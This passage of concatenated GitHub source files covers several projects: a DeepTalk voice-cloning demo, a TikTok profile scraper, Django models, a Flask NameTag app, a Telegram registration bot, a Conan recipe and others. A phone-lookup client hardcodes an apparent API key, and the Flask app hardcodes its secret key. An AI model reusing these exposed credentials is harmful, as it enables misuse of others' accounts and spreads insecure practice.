data.float()\n\n ## Evaluate the audio using the model\n x1 = model(data)\n x1_d = x1.data.cpu().float().numpy().flatten()\n embed_input = np.concatenate((x1_d, x1_d), axis=0)\n embed = embed_input\n if(normalize):\n embed = embed_input / np.linalg.norm(embed_input)\n\n return embed\n\n\ndef DeepTalk_encoder(file_path, model_save_path, module_name, preprocess=True, normalize=True, sampling_rate=8000, duration=None):\n\n encoder.load_model(model_save_path, module_name=module_name)\n\n if(preprocess):\n wav = Synthesizer.load_preprocess_wav(file_path)\n ref_audio = encoder.preprocess_wav(wav)\n else:\n ref_audio, sr = librosa.load(file_path, sr=sampling_rate)\n\n if(duration is not None):\n ref_audio = ref_audio[0:int(duration*sampling_rate)]\n\n embed, partial_embeds, _ = encoder.embed_utterance(ref_audio, using_partials=True, return_partials=True)\n\n if(normalize):\n embed = embed / np.linalg.norm(embed)\n\n return embed\n\n\ndef DeepTalk_synthesizer(encoder_embedding, output_text, model_save_path, low_mem = False):\n synthesizer = Synthesizer(model_save_path, low_mem=low_mem)\n texts = 
output_text\n texts = texts.split(\"\\n\")\n embeds = np.stack([encoder_embedding] * len(texts))\n specs = synthesizer.synthesize_spectrograms(texts, embeds)\n breaks = [spec.shape[1] for spec in specs]\n spec = np.concatenate(specs, axis=1)\n mel = spec\n\n return mel, breaks\n\ndef DeepTalk_vocoder(synthesized_mel, breaks, model_save_path, normalize=True):\n vocoder.load_model(model_save_path)\n no_action = lambda *args: None\n wav1 = vocoder.infer_waveform(synthesized_mel, progress_callback=no_action, normalize=normalize)\n\n # Add breaks\n b_ends = np.cumsum(np.array(breaks) * Synthesizer.hparams.hop_size)\n b_starts = np.concatenate(([0], b_ends[:-1]))\n wavs = [wav1[start:end] for start, end, in zip(b_starts, b_ends)]\n breaks = [np.zeros(int(0.15 * Synthesizer.sample_rate))] * len(breaks)\n wav1 = np.concatenate([i for w, b in zip(wavs, breaks) for i in (w, b)])\n wav1 = wav1 / np.abs(wav1).max() * 0.97\n return wav1\n\n\ndef run_DeepTalk_demo(ref_audio_path='samples/ref_VCTKp240.wav', output_text='Hello World',\nenc_model_fpath=config.enc_model_fpath, enc_module_name=config.enc_module_name,\nsyn_model_dir=config.syn_model_dir, voc_model_fpath=config.voc_model_fpath, key_embed=None):\n class hyperparameter:\n def __init__(self):\n\n self.enc_model_fpath = enc_model_fpath\n self.enc_module_name = enc_module_name\n self.syn_model_dir = syn_model_dir\n self.voc_model_fpath = voc_model_fpath\n\n self.enc_normalize = False\n self.voc_normalize = True\n self.low_mem = False # \"If True, the memory used by the synthesizer will be freed after each use. Adds large \"\n # \"overhead but allows to save some GPU memory for lower-end GPUs.\"\n self.no_sound = False # If True, audio won't be played.\n self.sampling_rate = 16000 ## 16000: For mel-spectrogram based methods; 8000: For fCNN base methods\n self.ref_audio_path = ref_audio_path\n self.output_text = output_text\n\n args = hyperparameter()\n\n ## Load trained models: Encoder, Synthesizer, and Vocoder\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\n encoder.load_model(args.enc_model_fpath, module_name=args.enc_module_name)\n synthesizer = Synthesizer(args.syn_model_dir, low_mem=args.low_mem)\n vocoder.load_model(args.voc_model_fpath)\n\n ## Encoding stage\n print('---------------------------------------------------------------')\n print('Stage 1/3: Encoder')\n print('---------------------------------------------------------------')\n wav = Synthesizer.load_preprocess_wav(args.ref_audio_path)\n ref_audio = encoder.preprocess_wav(wav)\n\n embed, partial_embeds, _ = encoder.embed_utterance(ref_audio, using_partials=True, return_partials=True, key_embed = key_embed)\n if(args.enc_normalize):\n embed = embed / np.linalg.norm(embed)\n\n if(embed.shape[0]==128):\n embed = np.concatenate((embed, embed), axis=0)\n\n\n ## Synthesizing stage\n print('---------------------------------------------------------------')\n print('Stage 2/3: Synthesizer')\n print('---------------------------------------------------------------')\n texts = args.output_text\n # texts = re.split(',|.',texts)\n texts = re.split(r'[,.]\\s*', texts)\n texts[:] = [x for x in texts if x]\n print(texts)\n # texts = texts.split(\"\\n\")\n # texts = texts.split(\".\")\n # texts = texts.split(\",\")\n embeds = np.stack([embed] * len(texts))\n specs = synthesizer.synthesize_spectrograms(texts, embeds)\n breaks = [spec.shape[1] for spec in specs]\n synthesized_mel = np.concatenate(specs, axis=1)\n\n ## Vocoding stage\n 
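# render the synthesized mel-spectrogram to an audible waveform\n 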
print('---------------------------------------------------------------')\n print('Stage 3/3: Vocoder')\n print('---------------------------------------------------------------')\n no_action = lambda *args: None\n wav1 = vocoder.infer_waveform(synthesized_mel, progress_callback=no_action, normalize=args.voc_normalize)\n # Add breaks\n b_ends = np.cumsum(np.array(breaks) * Synthesizer.hparams.hop_size)\n b_starts = np.concatenate(([0], b_ends[:-1]))\n wavs = [wav1[start:end] for start, end, in zip(b_starts, b_ends)]\n breaks = [np.zeros(int(0.15 * Synthesizer.sample_rate))] * len(breaks)\n wav1 = np.concatenate([i for w, b in zip(wavs, breaks) for i in (w, b)])\n synthesized_wav = wav1 / np.abs(wav1).max() * 0.97\n\n return synthesized_wav, Synthesizer.sample_rate, embed\n","repo_name":"iPRoBe-lab/DeepTalk","sub_path":"demo_functions.py","file_name":"demo_functions.py","file_ext":"py","file_size_in_byte":8284,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"5923540680","text":"import json\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom selenium import webdriver\nfrom selenium.common import exceptions\nfrom selenium.webdriver.chrome.service import Service\nimport datetime as dt\nfrom time import sleep\nimport sys\nimport os.path\nimport pandas as pd\nfrom typing import List, Dict, Tuple\nfrom tqdm import tqdm\n\n\nclass TikTuki():\n def __init__(self, username: str):\n self.driver = self.init_driver()\n self.username = username\n\n def init_driver(self) -> webdriver.Chrome:\n options = webdriver.ChromeOptions()\n options.set_capability(\"goog:loggingPrefs\", {\"performance\": \"ALL\", \"browser\": \"ALL\"})\n options.add_argument('--headless')\n options.add_argument('--no-sandbox')\n options.add_argument('--disable-dev-shm-usage')\n options.add_argument(\"window-size=1400,600\")\n options.add_argument(\"--incognito\")\n user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36' \n options.add_argument(f'user-agent={user_agent}')\n\n return webdriver.Chrome(options=options)\n\n def scrape_page_source(self, html: str) -> Dict[str, str]:\n soup = BeautifulSoup(html, 'html.parser')\n\n videos_data = {}\n\n for anchor in soup.find_all('a', href=True):\n if anchor.has_attr('title'):\n videos_data[anchor['href']] = anchor['title']\n \n return videos_data \n\n def get_video_urls(self, full: bool) -> Dict[str, str]:\n browser = self.driver\n browser.get(f'https://www.tiktok.com/@{self.username}')\n print(f\"Scraping {self.username}'s profile\")\n \n # For a full profile scrape\n if full == True:\n # The TikTok feed scrolls infinitely; the workaround applied here follows\n # the approach proposed in:\n #https://github.com/KuanWeiBeCool/Choose-best-Sephora-Make-up-Products-With-A-Limited-Budget/blob/55d474f9441d0b6a1b71a44e5267b386b66b292b/Web%20Scrapping%20For%20Infinite%20Scrolling%20Websites%20Using%20Selenium.ipynb\n screen_height = browser.execute_script('return window.screen.height;')\n counter = 0\n\n while True:\n browser.execute_script(f'window.scrollTo(0, {screen_height * counter});')\n scroll_height = browser.execute_script('return document.body.scrollHeight;')\n sleep(3)\n counter += 1\n\n if (screen_height * counter) > scroll_height:\n break\n\n html = browser.page_source\n \n # For a partial scrape (default)\n else:\n html = browser.page_source\n \n browser.quit() \n videos_dict = self.scrape_page_source(html)\n\n # Exit program if 
no videos were found\n if len(videos_dict) == 0:\n sys.exit('Empty or non-existent profile')\n \n print(f'Got {len(videos_dict)} videos')\n return videos_dict \n\n def get_post_metrics(self, video_urls: List[str]) -> Dict[str, int]:\n for url in tqdm(video_urls):\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n post_data = {}\n metrics = soup.find_all('strong', attrs={'data-e2e': True})\n\n post_data['url'] = url\n\n try:\n post_data['desc'] = soup.find_all('span', attrs={'class': 'tiktok-j2a19r-SpanText efbd9f0'})[0].text\n \n for metric in metrics:\n post_data[metric['data-e2e']] = metric.text\n\n except:\n for key in ['like-count', 'comment-count', 'undefined-count', 'share-count']:\n post_data[key] = 0\n post_data['desc'] = 'Video not found'\n\n yield post_data\n \n def get_video_data(self, full: bool) -> List[Dict[str, int]]:\n video_urls = self.get_video_urls(full)\n post_metrics = self.get_post_metrics(video_urls.keys())\n output_list = []\n\n for i in post_metrics:\n output_list.append(i) \n\n return output_list\n","repo_name":"yuki-shi/tiktuki","sub_path":"tiktuki.py","file_name":"tiktuki.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"36266463677","text":"# load the class label\nfile_name = '/media/agent/eb0d0016-e15f-4a25-8c28-0ad31789f3cb/Scene/DEDUCE/scene_30_all.txt'\n\nclasses = list()\nwith open(file_name) as class_file:\n for line in class_file:\n cur_sn = line.split()[0].rsplit('/')[-1].strip().rsplit('_')[0]+'_'+line.split()[0].rsplit('/')[-1].strip().rsplit('_')[1]\n if not cur_sn in classes:\n classes.append(cur_sn)\nclasses = tuple(classes)\n\nfile = '/media/agent/eb0d0016-e15f-4a25-8c28-0ad31789f3cb/Scene/DEDUCE/download_classes.txt'\n\nclasses_2 = list()\nwith open(file) as class_file:\n for line in class_file:\n cur_sn = line.split()[0]\n classes_2.append(cur_sn)\nclasses_2 = tuple(classes_2)\n\nc = classes_2==classes\n\nimg_name = line.split()[0].rsplit('/')[-1].strip()\nsn_name = line.split()[0].rsplit('/')[-1].strip().rsplit('_')[0]+'_'+line.split()[0].rsplit('/')[-1].strip().rsplit('_')[1]\nprint(img_name)","repo_name":"LiuXiang199x/ScenceRecog","sub_path":"DEDUCE/read_sn.py","file_name":"read_sn.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42322170089","text":"import os\nfrom setuptools import setup\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(\n name=\"pyconllu\",\n version=\"0.1.2\",\n author=\"Susana Sotelo\",\n author_email=\"susana.sotelo@linguarum.net\",\n description=(\n \"Package with classes to manage files in CoNLL-U format.\"),\n license=\"GPL\",\n packages=[\"pyconllu\"],\n long_description=read(\"README.rst\"),\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Programming Language :: Python\",\n \"Topic :: Text Processing :: Linguistic\",\n ]\n)\n","repo_name":"social-datalab/pyconllu","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73097442807","text":"# Created by: Justin Bronson\n# Created on: Dec 2017\n# Created for: ICS3U\n# This class controls the lasers\n\nfrom scene import *\nimport 
math\nimport sound\nimport datetime\nfrom main_game import *\n\nclass Laser:\n \n sprite_scale= 1\n sprite_file= './assets/sprites/bullet.png'\n \n def __init__(self, x1arg, y1arg, x2arg, y2arg, xAngle):\n # Flight Boundary \n self.x1=x1arg\n self.y1=y1arg\n self.x2=x2arg\n self.y2=y2arg\n \n # Properties \n self.speed = 400\n self.x_velocity = float(0)\n self.y_velocity = float(0)\n self.max_distance = 500\n \n self.distance=0\n \n self.delete = False\n \n self.angle= xAngle + 90\n if self.angle> 360:\n self.angle-= 360\n \n self.sprite = None\n \n self.scale_x = math.cos(math.radians(self.angle))\n self.scale_y = math.sin(math.radians(self.angle)) \n self.x_velocity = self.speed * self.scale_x \n self.y_velocity = self.speed * self.scale_y \n \n def move(self):\n \n if self.sprite.scene is None:\n return\n move_sprite= True\n xpos = self.sprite.position[0] + self.x_velocity * self.sprite.scene.dt\n ypos = self.sprite.position[1] + self.y_velocity * self.sprite.scene.dt\n self.distance += self.speed * self.sprite.scene.dt\n \n #Should the ship move\n if self.sprite.position[0] < self.x1:\n #Ship has moved off screen\n xpos = self.x2\n ypos = self.sprite.position[1]\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n move_sprite= False\n \n elif self.sprite.position[0] > self.x2:\n xpos = self.x1\n ypos = self.sprite.position[1]\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n move_sprite= False\n \n if self.sprite.position[1] < self.y1:\n ypos = self.y2\n xpos = self.sprite.position[0]\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n move_sprite= False\n \n elif self.sprite.position[1] > self.y2:\n ypos = self.y1\n xpos = self.sprite.position[0]\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n move_sprite= False\n \n if move_sprite== True:\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n \n if self.distance >= self.max_distance:\n self.sprite.remove_from_parent()\n self.delete = True\n \n def draw(self, parent, x , y):\n self.sprite = SpriteNode(self.sprite_file,\n parent = parent,\n position = Vector2(x,y),\n scale = self.sprite_scale)\n \n","repo_name":"MotherTeresaHS/ICS3U-2017-Group4","sub_path":"Asteroid Attack (Group 4)-3/laser.py","file_name":"laser.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13879600417","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import AbstractUser\nfrom django.core.mail import send_mail\nfrom django.db.models import (\n SET_NULL,\n BooleanField,\n CharField,\n DateField,\n DateTimeField,\n ImageField,\n IntegerChoices,\n ManyToManyField,\n Model,\n OneToOneField,\n PositiveSmallIntegerField,\n)\nfrom django.utils.translation import gettext_lazy as _\n\n\ndef user_directory_path(instance, filename):\n return f\"user_{instance.user.id}/profile_pics/{filename}\"\n\n\nclass Role(Model):\n class UserType(IntegerChoices):\n REGULAR = 0, _(\"Regular User\")\n STUDENT = 1, _(\"Student\")\n TEACHER = 2, _(\"Teacher\")\n SECRETARY = 3, _(\"Secretary\")\n SUPERVISOR = 4, _(\"Supervisor\")\n ADMIN = 5, _(\"Administrator\")\n\n user_type = PositiveSmallIntegerField(\n choices=UserType.choices, default=UserType.REGULAR, primary_key=True\n )\n\n\nclass User(AbstractUser):\n roles = 
ManyToManyField(Role)\n middle_name = CharField(max_length=30, blank=True)\n date_of_birth = DateField(null=True, blank=True)\n\n def email_user(self, subject, message, from_email=None, **kwargs):\n \"\"\"Sends an email to this User.\"\"\"\n send_mail(subject, message, from_email, [self.email], **kwargs)\n\n\nclass Profile(Model):\n # file will be uploaded to MEDIA_ROOT/user_<id>/profile_pics/\n user = OneToOneField(get_user_model(), on_delete=SET_NULL, null=True)\n date_created = DateTimeField(auto_now_add=True)\n date_modified = DateTimeField(auto_now=True)\n is_public = BooleanField(default=False)\n is_active = BooleanField(default=True)\n image = ImageField(default=\"default.webp\", upload_to=user_directory_path)\n # @cached_property\n # def friends(self):\n # pass\n\n\n# have rust task using celery or golang task to convert image files to webp.\n","repo_name":"wearypossum4770/jubilant-tasker","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10573151998","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Matthias Guggenmos \n# 2021\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport os\n\n\ndef smooth(x, window_len=5, window='hanning'):\n if window == 'flat':\n w = np.ones(window_len, 'd')\n else:\n w = eval('np.'+window+'(window_len)')\n y = np.convolve(w/w.sum(), x, mode='valid')\n return y\n\n\ndef savefig(path, relative_to_home=False, bbox_inches='tight', pad_inches=0, dpi=300, **kwargs):\n mpl.rcParams['svg.fonttype'] = 'none'\n if relative_to_home:\n path = os.path.join(os.path.expanduser(\"~\"), path)\n plt.savefig(path, bbox_inches=bbox_inches, pad_inches=pad_inches, dpi=dpi, **kwargs)\n\n\ndef set_fontsize(label=None, xlabel=None, ylabel=None, tick=None, xtick=None, ytick=None, title=None, scheme=None):\n\n fig = plt.gcf()\n\n if scheme == 'default':\n label = 14\n tick = 12\n title = 16\n\n for ax in fig.axes:\n if xlabel is not None:\n ax.xaxis.label.set_size(xlabel)\n elif label is not None:\n ax.xaxis.label.set_size(label)\n if ylabel is not None:\n ax.yaxis.label.set_size(ylabel)\n elif label is not None:\n ax.yaxis.label.set_size(label)\n\n if xtick is not None:\n for ticklabel in (ax.get_xticklabels()):\n ticklabel.set_fontsize(xtick)\n elif tick is not None:\n for ticklabel in (ax.get_xticklabels()):\n ticklabel.set_fontsize(tick)\n if ytick is not None:\n for ticklabel in (ax.get_yticklabels()):\n ticklabel.set_fontsize(ytick)\n elif tick is not None:\n for ticklabel in (ax.get_yticklabels()):\n ticklabel.set_fontsize(tick)\n\n if title is not None:\n ax.title.set_fontsize(title)\n","repo_name":"m-guggenmos/metameasure","sub_path":"plot/plot_util.py","file_name":"plot_util.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4010975009","text":"from flask import Flask, render_template, request, send_file\nfrom forms import TextForm\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'bf41cdb8be7df3e599e80a7e747bb926'\n\n@app.route(\"/\", methods=['POST', 'GET'])\ndef add_Text():\n\n form = TextForm()\n text = request.form.get(\"text\", \"\")\n\n with open('download.txt', 'w', encoding='utf-8') as fo:\n fo.write(text)\n\n files = {\n 'data':open(\"download.txt\",'rb'),\n }\n\n apiURL = 
\"http://lindat.mff.cuni.cz/services/nametag/api/recognize\"\n response = requests.post(apiURL,files = files)\n NametagResponse = response.json()\n\n textData = (str(NametagResponse))\n clearedText = delete(textData)\n replacedText = replace(clearedText)\n\n with open('downloadText.txt', 'w', encoding='utf-8') as fo:\n fo.write(replacedText)\n\n return render_template(\"home.html\", form=form, text=replacedText)\n\n@app.route('/upload', methods = ['POST', 'GET']) \ndef upload(): \n\n if request.method == 'POST': \n f = request.files['file']\n f.save(f.filename) \n global name\n name = f.filename\n\n checkValues = (request.form.getlist('checkbox'))\n uploadfile = open(name, \"r\", encoding='utf-8')\n soup = BeautifulSoup(uploadfile, features = \"html.parser\")\n values = soup.find_all(checkValues)\n dataToSend = \"\"\n for heading in values:\n dataToSend = dataToSend + heading.text.strip() + \";\"\n \n with open('dataFile.txt', 'w', encoding='utf-8') as fo:\n fo.write(dataToSend)\n\n files = {\n 'data':open(\"dataFile.txt\",'rb'),\n }\n\n apiURL = \"http://lindat.mff.cuni.cz/services/nametag/api/recognize\"\n response = requests.post(apiURL,files = files)\n NametagResponse = response.text\n\n clearedText = delete(NametagResponse)\n replacedText = replace(clearedText)\n\n responseList = list(replacedText.split(';'))\n responseList.pop()\n\n for i, value in enumerate(values):\n value.string.replace_with(responseList[i])\n\n with open('modified.html', 'w', encoding='utf-8') as fo:\n fo.write(soup.prettify(formatter=None))\n\n return render_template(\"potvrdenie.html\", nazov = name)\n\ndef delete(deletetext):\n\n before = deletetext.partition(\"\") \n deletetext = deletetext.replace(before[0],\"\")\n deletetext = re.sub(r'|||',\"\",deletetext)\n deletetext = deletetext.replace(\"\\\\\", \"\").replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\").replace(\"}\", \"\")\n return deletetext\n\ndef replace(replacetext):\n\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('',' ')\n replacetext = replacetext.replace('','')\n\n return replacetext\n\n@app.route('/downloadtext') \ndef downloadtext():\n\n return send_file(\"downloadText.txt\", as_attachment=True)\n\n@app.route('/download') \ndef download():\n\n return send_file(\"modified.html\", as_attachment=True)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"VDominik/MicrodataRecognizer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10294473376","text":"# -*- coding:utf-8 -*-\n# @Time:2020/7/30 15:34\n# @Author:martin\n# @File:phone.py\nimport requests\n# key = 63a77489d2c51d26b4031e344b4f0050\nclass Phone(object):\n\n def phone_location(self, phone, key):\n url = 'http://apis.juhe.cn/mobile/get'\n par = {\n \"phone\": phone,\n \"key\": key\n\n }\n r = requests.get(url=url,params=par)\n return r\n\nif __name__ == '__main__':\n p = Phone()\n r = p.phone_location(\"13979296069\",\"63a77489d2c51d26b4031e344b4f0050\")\n 
print(r.text)","repo_name":"martin-deng-ce/interface","sub_path":"phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39040542254","text":"from aiogram import types, Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\n\nfrom database.bot_db import sql_command_insert\nfrom keyboards import client_kb\nfrom uuid import uuid4\nfrom config import ADMINS\n\n\nclass FSMAdmin(StatesGroup):\n id1 = State()\n name = State()\n age = State()\n direction = State()\n group = State()\n submit = State()\n\n\nasync def fsm_start(message: types.Message):\n if message.chat.type == \"private\" and message.chat.id in ADMINS:\n await FSMAdmin.id1.set()\n await message.answer(\"Your id is ready!\", reply_markup=client_kb.cancel_markup)\n else:\n await message.answer(\"Write to the group!\")\n\n\nasync def load_id(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['id'] = str(uuid4())\n await FSMAdmin.next()\n await message.answer(\"Enter your name: \", reply_markup=client_kb.cancel_markup)\n\n\nasync def load_name(message: types.Message, state: FSMContext):\n name = message.text.strip()\n if not name.isalpha():\n await message.answer(\"Your name should contain only letters\")\n else:\n async with state.proxy() as data:\n data['username'] = message.from_user.username\n data['name'] = name\n await FSMAdmin.next()\n await message.answer(\"Enter your age: \")\n\n\nasync def load_age(message: types.Message, state: FSMContext):\n if not message.text.isdigit():\n await message.answer(\"Write in numbers!\")\n elif int(message.text) < 15 or int(message.text) > 40:\n await message.answer(\"Your age should be a number between 15 and 40\")\n else:\n async with state.proxy() as data:\n data['age'] = message.text\n await FSMAdmin.next()\n await message.answer(\"What direction are you studying?: \", reply_markup=client_kb.direction_markup)\n\n\nasync def load_direction(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['direction'] = message.text\n await FSMAdmin.next()\n await message.answer(\"What group are you in?: \", reply_markup=client_kb.cancel_markup)\n\n\nasync def load_group(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['group'] = message.text\n await message.answer(f\"{data['name']} {data['age']} {data['group']} {data['direction']}\\n\"\n f\"ID: {data['id']}\")\n await FSMAdmin.next()\n await message.answer(\"Is everything right?\", reply_markup=client_kb.submit_markup)\n\n\nasync def submit(message: types.Message, state: FSMContext):\n if message.text == \"yes\":\n await sql_command_insert(state)\n await message.answer(\"You are registered!\")\n await state.finish()\n elif message.text == \"no\":\n await state.finish()\n else:\n await message.answer(\"Please answer 'yes' or 'no'\")\n\n\nasync def cancel_reg(message: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state:\n await state.finish()\n await message.answer(\"You completed the operation\")\n await message.answer(\"canceled ✔️\")\n\n\ndef register_handlers_fsm_anketa(dp: Dispatcher):\n dp.register_message_handler(cancel_reg, state='*', commands=['cancel'])\n dp.register_message_handler(cancel_reg,\n Text(equals=\"cancel\", ignore_case=True), state='*')\n\n 
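# /reg starts the questionnaire; each handler below advances the FSM one state\n 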
dp.register_message_handler(fsm_start, commands=['reg'])\n dp.register_message_handler(load_id, state=FSMAdmin.id1)\n dp.register_message_handler(load_name, state=FSMAdmin.name)\n dp.register_message_handler(load_age, state=FSMAdmin.age)\n dp.register_message_handler(load_direction, state=FSMAdmin.direction)\n dp.register_message_handler(load_group, state=FSMAdmin.group)\n dp.register_message_handler(submit, state=FSMAdmin.submit)\n\n","repo_name":"ermeks6/Oliver","sub_path":"handlers/fsm_anketa.py","file_name":"fsm_anketa.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21865559441","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nhttps://nlp100.github.io/ja/ch01.html\n\n01. 「パタトクカシーー」\nExtract the 1st, 3rd, 5th, and 7th characters of the string 「パタトクカシーー」 and concatenate them.\n\"\"\"\n\n\nstr01=\"パタトクカシーー\"\n\nstr02=str01[::2]\n\nprint(str02)\n\n\n\n","repo_name":"gotzy/nlp100_workout","sub_path":"nlp_01.py","file_name":"nlp_01.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31942969295","text":"import os\n\nfrom conan import ConanFile\nfrom conan.tools.build import check_min_cppstd, cross_building\nfrom conan.tools.cmake import CMake, CMakeDeps, CMakeToolchain, cmake_layout\nfrom conan.tools.env import VirtualRunEnv, VirtualBuildEnv\nfrom conan.tools.files import apply_conandata_patches, copy, export_conandata_patches, get, replace_in_file, rmdir\nfrom conan.tools.microsoft import check_min_vs, is_msvc\nfrom conan.tools.scm import Version\nfrom conan.errors import ConanInvalidConfiguration\n\n# Load the generated component dependency information.\n#\n# `google-cloud-cpp` has well over 200 components. Conan cannot use the CMake\n# files generated by `google-cloud-cpp`. Manually maintaining this dependency\n# information is error prone and fairly tedious. A helper script in this\n# directory reproduces the algorithms used by `google-cloud-cpp` to generate its\n# dependency information. With each new revision of `google-cloud-cpp` the\n# script will be used to generate a new file with the component dependency\n# information. 
The expectation is that maintaining this script will be easier\n# than writing long lists of dependencies by hand.\nimport components_2_5_0\nimport components_2_12_0\n\nrequired_conan_version = \">=1.56.0\"\n\n\nclass GoogleCloudCppConan(ConanFile):\n name = \"google-cloud-cpp\"\n description = \"C++ Client Libraries for Google Cloud Services\"\n license = \"Apache-2.0\"\n topics = (\n \"google\",\n \"cloud\",\n \"google-cloud-storage\",\n \"google-cloud-platform\",\n \"google-cloud-pubsub\",\n \"google-cloud-spanner\",\n \"google-cloud-bigtable\",\n )\n homepage = \"https://github.com/googleapis/google-cloud-cpp\"\n url = \"https://github.com/conan-io/conan-center-index\"\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\"shared\": [True, False], \"fPIC\": [True, False]}\n default_options = {\"shared\": False, \"fPIC\": True}\n exports = [\"components_2_5_0.py\",\n \"components_2_12_0.py\",\n ]\n\n short_paths = True\n\n _GA_COMPONENTS = {\n '2.5.0': components_2_5_0.COMPONENTS,\n '2.12.0': components_2_12_0.COMPONENTS,\n }\n _PROTO_COMPONENTS = {\n '2.5.0': components_2_5_0.PROTO_COMPONENTS,\n '2.12.0': components_2_12_0.PROTO_COMPONENTS,\n }\n _PROTO_COMPONENT_DEPENDENCIES = {\n \"2.5.0\": components_2_5_0.DEPENDENCIES,\n \"2.12.0\": components_2_12_0.DEPENDENCIES,\n }\n # Some components require custom dependency definitions.\n _REQUIRES_CUSTOM_DEPENDENCIES = {\n \"bigquery\", \"bigtable\", \"iam\", \"pubsub\", \"spanner\", \"storage\",\n }\n\n def export_sources(self):\n export_conandata_patches(self)\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n self.options[\"protobuf\"].shared = True\n self.options[\"grpc\"].shared = True\n\n def validate(self):\n # As-of 2022-03, google-cloud-cpp only supports \"Visual Studio >= 2019\",\n # and Visual Studio < 2019 is out of mainline support.\n # The wikipedia page says this maps to 192* for the MSVC version:\n # https://en.wikipedia.org/wiki/Microsoft_Visual_C%2B%2B\n check_min_vs(self, \"192\")\n if is_msvc(self) and self.info.options.shared:\n raise ConanInvalidConfiguration(f\"{self.ref} shared not supported by Visual Studio\")\n\n if hasattr(self, \"settings_build\") and cross_building(self):\n raise ConanInvalidConfiguration(\n \"Recipe not prepared for cross-building (yet)\"\n )\n\n if self.version not in self._GA_COMPONENTS:\n raise ConanInvalidConfiguration(\n \"The components are unknown for version %s\" % self.version\n )\n\n if self.version not in self._PROTO_COMPONENTS:\n raise ConanInvalidConfiguration(\n \"The proto components are unknown for version %s\" % self.version\n )\n\n if self.version not in self._PROTO_COMPONENT_DEPENDENCIES:\n raise ConanInvalidConfiguration(\n \"The inter-component dependencies are unknown for version %s\" % self.version\n )\n\n if (\n self.settings.compiler == \"clang\"\n and Version(self.settings.compiler.version) < \"6.0\"\n ):\n raise ConanInvalidConfiguration(\"Clang version must be at least 6.0.\")\n\n if self.settings.compiler.cppstd:\n check_min_cppstd(self, 14)\n\n if (\n self.settings.compiler == \"gcc\"\n and Version(self.settings.compiler.version) < \"5.4\"\n ):\n raise ConanInvalidConfiguration(\"Building requires GCC >= 5.4\")\n\n if self.info.options.shared and \\\n (not self.dependencies[\"protobuf\"].options.shared or \\\n not self.dependencies[\"grpc\"].options.shared):\n raise 
